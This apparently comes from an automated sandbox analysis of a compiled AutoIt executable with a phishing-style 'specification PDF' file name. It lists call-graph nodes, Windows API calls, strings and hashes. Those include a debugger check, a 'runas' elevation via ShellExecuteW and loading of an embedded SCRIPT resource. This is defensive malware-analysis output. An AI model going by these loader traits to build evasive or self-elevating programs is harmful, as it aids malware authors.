94441 34c8ab 94440->94441 94541 35e968 49 API calls 94441->94541 94444 3b30d7 94442->94444 94445 34c91a 94442->94445 94448 344907 CloseHandle 94444->94448 94544 361dfc 94445->94544 94446 34c8b7 94449 34d7f7 48 API calls 94446->94449 94450 3b30e3 94448->94450 94451 34c8c3 94449->94451 94452 3441a9 136 API calls 94450->94452 94453 34660f 49 API calls 94451->94453 94454 3b310d 94452->94454 94455 34c8d1 94453->94455 94457 3b3136 94454->94457 94462 38c396 122 API calls 94454->94462 94542 35eb66 SetFilePointerEx ReadFile 94455->94542 94456 34c943 94461 34c96d SetCurrentDirectoryW 94456->94461 94560 3825b5 86 API calls 94457->94560 94459 34c8fd 94543 3446ce SetFilePointerEx SetFilePointerEx 94459->94543 94465 35f4ea 48 API calls 94461->94465 94466 3b3129 94462->94466 94464 3b314d 94499 34cad1 94464->94499 94467 34c988 94465->94467 94468 3b3152 94466->94468 94469 3b3131 94466->94469 94471 3447b7 48 API calls 
94467->94471 94470 344252 84 API calls 94468->94470 94472 344252 84 API calls 94469->94472 94473 3b3157 94470->94473 94502 34c993 94471->94502 94472->94457 94474 35f4ea 48 API calls 94473->94474 94481 3b3194 94474->94481 94475 34ca9d 94554 344907 94475->94554 94479 343d98 94479->93429 94479->93453 94480 34caa9 SetCurrentDirectoryW 94480->94499 94483 34ba85 48 API calls 94481->94483 94512 3b31dd 94483->94512 94485 3b33ce 94565 389b72 48 API calls 94485->94565 94486 3b3467 94569 3825b5 86 API calls 94486->94569 94490 3b3480 94490->94475 94491 3b33f0 94566 3a29e8 48 API calls 94491->94566 94493 3b33fd 94495 361c9d 47 API calls 94493->94495 94494 3b345f 94568 38240b 48 API calls 94494->94568 94495->94499 94497 34ce19 48 API calls 94497->94502 94534 3448dd 94499->94534 94500 34ba85 48 API calls 94500->94512 94502->94475 94502->94486 94502->94494 94502->94497 94547 34b337 56 API calls 94502->94547 94548 35c258 GetStringTypeW 94502->94548 94549 34cb93 59 API calls 94502->94549 94550 34cb5a GetStringTypeW 94502->94550 94551 3616d0 GetStringTypeW 94502->94551 94552 34cc24 162 API calls 94502->94552 94553 35c682 48 API calls 94502->94553 94506 34ce19 48 API calls 94506->94512 94509 3b3420 94567 3825b5 86 API calls 94509->94567 94511 3b3439 94513 361c9d 47 API calls 94511->94513 94512->94485 94512->94500 94512->94506 94512->94509 94561 382551 48 API calls 94512->94561 94562 382472 60 API calls 94512->94562 94563 389c12 48 API calls 94512->94563 94564 35c682 48 API calls 94512->94564 94514 3b344c 94513->94514 94514->94499 94516 34bb25 94515->94516 94521 34ba98 94515->94521 94518 35f4ea 48 API calls 94516->94518 94517 35f4ea 48 API calls 94519 34ba9f 94517->94519 94518->94521 94520 35f4ea 48 API calls 94519->94520 94522 34bac8 94519->94522 94520->94522 94521->94517 94522->94419 94524 344dec 94523->94524 94527 344e9a 94523->94527 94525 35f4ea 48 API calls 94524->94525 94528 344e1e 94524->94528 94525->94528 94526 35f4ea 48 API calls 94526->94528 94527->94419 94528->94526 
94528->94527 94529->94404 94530->94419 94531->94419 94532->94419 94533->94409 94535 344907 CloseHandle 94534->94535 94536 3448e5 94535->94536 94537 344907 CloseHandle 94536->94537 94538 3448fc 94537->94538 94538->94479 94539->94433 94540->94436 94541->94446 94542->94459 94543->94442 94570 361e46 94544->94570 94547->94502 94548->94502 94549->94502 94550->94502 94551->94502 94552->94502 94553->94502 94555 344920 94554->94555 94556 344911 94554->94556 94555->94556 94557 344925 CloseHandle 94555->94557 94556->94480 94557->94556 94558->94434 94559->94439 94560->94464 94561->94512 94562->94512 94563->94512 94564->94512 94565->94491 94566->94493 94567->94511 94568->94486 94569->94490 94571 361e61 94570->94571 94574 361e55 94570->94574 94594 367c0e 47 API calls 94571->94594 94573 362019 94576 361e41 94573->94576 94595 366e10 8 API calls 94573->94595 94574->94571 94585 361ed4 94574->94585 94589 369d6b 47 API calls 94574->94589 94576->94456 94577 361f41 94579 361fa0 94577->94579 94580 361f5f 94577->94580 94579->94571 94579->94576 94581 361fb0 94579->94581 94580->94571 94586 361f7b 94580->94586 94591 369d6b 47 API calls 94580->94591 94593 369d6b 47 API calls 94581->94593 94584 361f91 94592 369d6b 47 API calls 94584->94592 94585->94571 94585->94577 94590 369d6b 47 API calls 94585->94590 94586->94571 94586->94576 94586->94584 94589->94585 94590->94577 94591->94586 94592->94576 94593->94576 94594->94573 94595->94576 94597 344d94 94596->94597 94598 344c8b 94596->94598 94597->93562 94598->94597 94599 35f4ea 48 API calls 94598->94599 94600 344cb2 94599->94600 94601 35f4ea 48 API calls 94600->94601 94605 344d22 94601->94605 94604 344dd9 48 API calls 94604->94605 94605->94597 94605->94604 94606 34ba85 48 API calls 94605->94606 94609 34b470 94605->94609 94637 389af1 48 API calls 94605->94637 94606->94605 94607->93564 94608->93566 94638 346b0f 94609->94638 94611 34b69b 94612 34ba85 48 API calls 94611->94612 94613 34b6b5 94612->94613 94613->94605 94616 34ba85 48 API calls 94630 34b495 
94616->94630 94617 3b397b 94648 3826bc 88 API calls 94617->94648 94620 34b9e4 94649 3826bc 88 API calls 94620->94649 94621 3b3973 94621->94613 94624 3b3989 94626 34ba85 48 API calls 94624->94626 94625 34bcce 48 API calls 94625->94630 94626->94621 94627 3b3909 94629 346b4a 48 API calls 94627->94629 94628 34bb85 48 API calls 94628->94630 94631 3b3914 94629->94631 94630->94611 94630->94616 94630->94617 94630->94620 94630->94625 94630->94627 94630->94628 94633 34bdfa 48 API calls 94630->94633 94636 3b3939 94630->94636 94643 34c413 59 API calls 94630->94643 94644 34bc74 48 API calls 94630->94644 94645 34c6a5 49 API calls 94630->94645 94646 34c799 48 API calls 94630->94646 94635 35f4ea 48 API calls 94631->94635 94634 34b66c CharUpperBuffW 94633->94634 94634->94630 94635->94636 94647 3826bc 88 API calls 94636->94647 94637->94605 94639 35f4ea 48 API calls 94638->94639 94640 346b34 94639->94640 94641 346b4a 48 API calls 94640->94641 94642 346b43 94641->94642 94642->94630 94643->94630 94644->94630 94645->94630 94646->94630 94647->94621 94648->94624 94649->94621 94651 3b418d EnumResourceNamesW 94650->94651 94652 34403c LoadImageW 94650->94652 94653 343ee1 RegisterClassExW 94651->94653 94652->94653 94654 343f53 7 API calls 94653->94654 94654->93581 94656 344c44 94655->94656 94657 3b3c33 94655->94657 94656->93587 94681 385819 61 API calls 94656->94681 94657->94656 94658 3b3c3c DestroyIcon 94657->94658 94658->94656 94660 3451cb 94659->94660 94680 3452a2 94659->94680 94661 346b0f 48 API calls 94660->94661 94680->93592 94681->93587 94683 34ef1d 94682->94683 94684 34ef2f 94682->94684 94683->93626 94883 38cc5c 86 API calls 94684->94883 94686 3b86f9 94686->94686 94688 34f130 94687->94688 94690 34fe30 331 API calls 94688->94690 94695 34f199 94688->94695 94689 34f595 94698 34d7f7 48 API calls 94689->94698 94706 34f431 94689->94706 94692 3b8728 94690->94692 94691 3b87c8 94888 38cc5c 86 API calls 94691->94888 94692->94695 94885 38cc5c 86 API calls 94692->94885 94693 34f418 94702 3b8b1b 
94693->94702 94693->94706 94737 34f6aa 94693->94737 94695->94689 94699 34d7f7 48 API calls 94695->94699 94725 34f229 94695->94725 94741 34f3dd 94695->94741 94696 34fe30 331 API calls 94696->94706 94700 3b87a3 94698->94700 94703 3b8772 94699->94703 94701 34f3f2 94701->94693 94889 389af1 48 API calls 94701->94889 94886 360f0a 52 API calls 94703->94886 94704 38cc5c 86 API calls 94704->94706 94706->94696 94706->94704 94710 34d6e9 55 API calls 94706->94710 94711 3b8c53 94706->94711 94714 3b8b7e 94706->94714 94722 3b8beb 94706->94722 94726 351b90 48 API calls 94706->94726 94728 34f537 94706->94728 94733 34fce0 94706->94733 94884 34dd47 48 API calls 94706->94884 94896 3797ed InterlockedDecrement 94706->94896 94904 35c1af 48 API calls 94706->94904 94710->94706 94725->94689 94725->94693 94725->94706 94725->94741 94726->94706 94728->93626 94733->94728 94737->94706 94737->94728 94737->94733 94741->94691 94741->94701 94741->94706 94753 354637 94752->94753 94754 35479f 94752->94754 94755 354643 94753->94755 94756 3b6e05 94753->94756 94757 34ce19 48 API calls 94754->94757 94905 354300 94755->94905 94973 39e822 94756->94973 94764 3546e4 94757->94764 94920 396ff0 94764->94920 94929 38fa0c 94764->94929 94970 386524 94764->94970 94768->93626 95094 34bd30 94769->95094 94771 353267 94773 3b907a 94771->94773 94774 3532f8 94771->94774 94831 353628 94771->94831 95117 38cc5c 86 API calls 94773->95117 95112 35c36b 86 API calls 94774->95112 94840 353635 94831->94840 95116 38cc5c 86 API calls 94831->95116 94840->93626 94841->93626 94842->93626 94843->93597 94844->93600 94845->93605 94846->93626 94847->93626 94848->93639 94849->93639 94850->93639 94852 34fe50 94851->94852 94873 34fe7e 94851->94873 94853 35f4ea 48 API calls 94852->94853 94853->94873 94854 360f0a 52 API calls 94854->94873 94855 35146e 94856 346eed 48 API calls 94855->94856 94865 34ffe1 94856->94865 94857 351473 95139 38cc5c 86 API calls 94857->95139 94858 3797ed InterlockedDecrement 94858->94873 94859 350509 95140 38cc5c 86 API 

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                        • Part of subcall function 00346430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343DEE,00401148,?,?,?,?,?,00343AA3,?), ref: 00346471
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F28F4,00000010), ref: 003B1CCE
                                      • SetCurrentDirectoryW.KERNEL32(?,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D06
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003DDAB4,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D89
                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00343AA3), ref: 003B1D90
                                        • Part of subcall function 00343E6E: GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                        • Part of subcall function 00343E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                        • Part of subcall function 00343E6E: LoadIconW.USER32(00000063), ref: 00343E9E
                                        • Part of subcall function 00343E6E: LoadIconW.USER32(000000A4), ref: 00343EB0
                                        • Part of subcall function 00343E6E: LoadIconW.USER32(000000A2), ref: 00343EC2
                                        • Part of subcall function 00343E6E: RegisterClassExW.USER32(?), ref: 00343F30
                                        • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                        • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                        • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                        • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                        • Part of subcall function 00344FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003450CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                        • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell_
                                      • String ID: ()?$This is a third-party compiled AutoIt script.$runas
                                      • API String ID: 1889724702-42928549
                                      • Opcode ID: a8be32d4756e3ba6590e373f6dfdbca0deafea173dbc7a4f7d75527bca078f14
                                      • Instruction ID: 13565b8e901344168d4240a5c36d0658e42d12ecdd50616a7a94616abd09a188
                                      • Opcode Fuzzy Hash: a8be32d4756e3ba6590e373f6dfdbca0deafea173dbc7a4f7d75527bca078f14
                                      • Instruction Fuzzy Hash: AF510731E05248ABCF17ABB0DD46EEE7BB99B19704F004079F641BF1A2DB746645CB21

                                      Control-flow Graph

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                      • Instruction ID: 7058acf73c370e7cb4c884c53df2a085a6a8dd4002b07d1ba3299e69b5699435
                                      • Opcode Fuzzy Hash: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                      • Instruction Fuzzy Hash: 63324D75A022688FCB268F15DC41AE9B7B5FF46310F5980D9E40AE7A89D7309EC1CF52

                                      Control-flow Graph

                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0035DDEC
                                      • GetCurrentProcess.KERNEL32(00000000,003DDC38,?,?), ref: 0035DEAC
                                      • GetNativeSystemInfo.KERNELBASE(?,003DDC38,?,?), ref: 0035DF01
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF0C
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF1F
                                      • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF29
                                      • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF35
                                      Similarity
                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                      • String ID:
                                      • API String ID: 3851250370-0
                                      • Opcode ID: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                      • Instruction ID: f2624dbde9988210c1dd79d7016d1dac2557d89ea481b78f351486bebbf2be66
                                      • Opcode Fuzzy Hash: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                      • Instruction Fuzzy Hash: 6B61A0B180A284CFCF27CF6898C19EA7FB46F29305B1A49D9DC859F217C624C90DCB65

                                      Control-flow Graph

                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0034449E,?,?,00000000,00000001), ref: 0034407B
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0034449E,?,?,00000000,00000001), ref: 00344092
                                      • LoadResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F1A
                                      • SizeofResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F2F
                                      • LockResource.KERNEL32(0034449E,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB,00000000), ref: 003B4F42
                                      Strings
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                      • Instruction ID: 724adccd68be27bebed513be57a35fd7f9b41c26b0e95862bd61b4e3ff49b0b7
                                      • Opcode Fuzzy Hash: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                      • Instruction Fuzzy Hash: B3112A71200705AFE7228B65EC49F67BBBDEBC5B51F10457CF602DA6A0DA71EC048B20
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: @$ @$ @$ @
                                      • API String ID: 0-1793783390
                                      • Opcode ID: 5974f890d2d1dc3015db0713c83f69cbe129c50637bd77e497ef9736563e6eec
                                      • Instruction ID: 6205727fc5bacc2c2cb0dd2f2363677ac37c947122b027883deef174b72334d9
                                      • Opcode Fuzzy Hash: 5974f890d2d1dc3015db0713c83f69cbe129c50637bd77e497ef9736563e6eec
                                      • Instruction Fuzzy Hash: D372BC31E042089FCF16DF94C481EAEB7B5EF48345F15806AED09AF6A1D730AE49CB91
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,003B2F49), ref: 00386CB9
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00386CCA
                                      • FindClose.KERNEL32(00000000), ref: 00386CDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                      • Instruction ID: aafa502b2109a5d59645119d7fdf880d607e86928ce1af0a3f3e277ca399108c
                                      • Opcode Fuzzy Hash: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                      • Instruction Fuzzy Hash: EAE048318145155B86517738EC0E8E9777CDA05339F144765F575C11D0E770E94447D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: @
                                      • API String ID: 3964851224-124383662
                                      • Opcode ID: d0303b1acc15930337f71cee4588213bc96f3c7c93b274a4c99b7d8145a1287b
                                      • Instruction ID: 559e33b1706b99c9592b70b5e1a2d8a328ce2dfc568b5e0e849286706b22eda1
                                      • Opcode Fuzzy Hash: d0303b1acc15930337f71cee4588213bc96f3c7c93b274a4c99b7d8145a1287b
                                      • Instruction Fuzzy Hash: 8F929B706083418FD726DF18C480F6AB7E5BF88348F15885DE98A8B762D771ED49CB92
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                      • timeGetTime.WINMM ref: 0034EBFA
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034ED2E
                                      • TranslateMessage.USER32(?), ref: 0034ED3F
                                      • DispatchMessageW.USER32(?), ref: 0034ED4A
                                      • LockWindowUpdate.USER32(00000000), ref: 0034ED79
                                      • DestroyWindow.USER32 ref: 0034ED85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0034ED9F
                                      • Sleep.KERNEL32(0000000A), ref: 003B5270
                                      • TranslateMessage.USER32(?), ref: 003B59F7
                                      • DispatchMessageW.USER32(?), ref: 003B5A05
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003B5A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                      • API String ID: 2641332412-570651680
                                      • Opcode ID: 04301f373214fc6dc52ddd8acfcb4a572ce2862254fc31192224a17a236b4d7d
                                      • Instruction ID: beb1ec2c9451e47394b9d442a189793fba7a4734bbac49387f4290ca8c2b38c8
                                      • Opcode Fuzzy Hash: 04301f373214fc6dc52ddd8acfcb4a572ce2862254fc31192224a17a236b4d7d
                                      • Instruction Fuzzy Hash: 8D62B070508340DFDB26DF24C885BAA77E8BF45304F04497DFA869F6A2DB75A848CB52

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                      • RegisterClassExW.USER32(00000030), ref: 00343FB0
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                      • LoadIconW.USER32(000000A9), ref: 00344004
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                      • Instruction ID: 0deda29dace51c6f5087e468232a98cac97113b7fdadd831e53ab1414084c8b4
                                      • Opcode Fuzzy Hash: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                      • Instruction Fuzzy Hash: 1821C3B5D00218AFDB01DFA4ED89BCDBBB8FB08704F00462AFA15F62A0D7B555448F95

                                      Control-flow Graph

                                      • Graph rendering not reproduced; basic blocks 343742-343845 and 3b1da3-3b1ea2, with calls to DefWindowProcW, PostQuitMessage, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow and SetFocus
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 003437B3
                                      • KillTimer.USER32(?,00000001), ref: 003437DD
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00343800
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034380B
                                      • CreatePopupMenu.USER32 ref: 0034381F
                                      • PostQuitMessage.USER32(00000000), ref: 0034382E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: 3923b721de594c77f18c1ce20d472bc42e6122b22f2a1a4cf9fcdad7d4fc0948
                                      • Instruction ID: b785c39d9c0028f5c44d7fda5d52794be18fab22e2ff98e0e055402a8036320e
                                      • Opcode Fuzzy Hash: 3923b721de594c77f18c1ce20d472bc42e6122b22f2a1a4cf9fcdad7d4fc0948
                                      • Instruction Fuzzy Hash: A74128F1104245A7DB176B689D4AFBA3AD9F704300F400135FA82EF9E1CB75BE509766

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                      • LoadIconW.USER32(00000063), ref: 00343E9E
                                      • LoadIconW.USER32(000000A4), ref: 00343EB0
                                      • LoadIconW.USER32(000000A2), ref: 00343EC2
                                        • Part of subcall function 00344024: LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                      • RegisterClassExW.USER32(?), ref: 00343F30
                                        • Part of subcall function 00343F53: GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                        • Part of subcall function 00343F53: RegisterClassExW.USER32(00000030), ref: 00343FB0
                                        • Part of subcall function 00343F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                        • Part of subcall function 00343F53: InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                        • Part of subcall function 00343F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                        • Part of subcall function 00343F53: LoadIconW.USER32(000000A9), ref: 00344004
                                        • Part of subcall function 00343F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                      • Instruction ID: 2f27ed00f3e4d5891fdca08c945ff3753f6e8bedd5911421caa425f091fe50ba
                                      • Opcode Fuzzy Hash: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                      • Instruction Fuzzy Hash: E92130B0D00304ABCB05DFA9ED49A99BFF9FB48310F00813AE618BB2B1D77556448F95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
